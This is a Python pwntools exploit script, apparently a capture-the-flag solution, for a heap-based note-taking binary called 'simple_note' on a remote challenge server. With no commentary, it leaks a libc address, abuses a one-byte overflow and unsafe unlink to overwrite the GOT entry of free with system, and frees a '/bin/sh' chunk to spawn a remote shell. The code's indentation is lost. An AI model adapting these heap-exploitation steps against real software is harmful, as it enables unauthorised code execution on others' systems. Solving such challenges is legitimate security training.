Rating: 1.0

```
from pwn import *
import os

DEBUG = False

context.log_level = 'debug'

env = os.environ
env['LD_PRELOAD'] = 'libc.so.6'

elf = ELF('./simple_note')
libc = ELF('./libc.so.6')

if DEBUG:
p = process('simple_note', env=env)
else:
p = remote('pwn1.chal.ctf.westerns.tokyo', 16317)

def add(size, content):
p.recvuntil('Your choice: \n')
p.sendline('1')
p.recvuntil('Please input the size: \n')
p.sendline(str(size))
p.recvline('Please input your note: \n')
p.send(content)

def delete(index):
p.recvuntil('Your choice: \n')
p.sendline('2')
p.recvuntil('Please input the index: \n')
p.sendline(str(index))

def show(index):
p.recvuntil('Your choice: \n')
p.sendline('3')
p.recvuntil('Please input the index: \n')
p.sendline(str(index))
p.recvuntil('Note: \n')
return p.recvuntil('\n======================', drop=True)

def edit(index, content):
p.recvuntil('Your choice: \n')
p.sendline('4')
p.recvuntil('Please input the index: \n')
p.sendline(str(index))
p.recvline('Please input your note: \n')
p.send(content)

add(0x88, 'A'*0x88)
add(0x88, 'G'*0x88)
add(0x88, 'B'*0x88)
add(0x88, 'C'*0x58+p64(0xc1))
add(0x88, 'D'*0x88)
add(0x88, 'E'*0x88)

ptr = 0x6020C0

delete(0)
add(0x88, 'F'*8)
libc_base = u64(show(0)[8:].ljust(8, '\x00')) - 0x3c4b78

edit(1, 'H'*0x88 + '\xf1')

delete(2)
add(0xe8, '/bin/sh\x00' + 'I'*0x90 + p64(0x90*2-16+1) + p64(ptr) + p64(ptr+8))
edit(4, 'J'*0x80 + p64(0x90*2-16) + '\x90')

delete(5)

free_got = elf.got['free']
system = libc.symbols['system'] + libc_base
execve = libc_base + libc.symbols['execve']
one_gadget = libc_base + 0xf1117

edit(3, p64(free_got))
edit(0, p64(system))

delete(2)

p.interactive()
```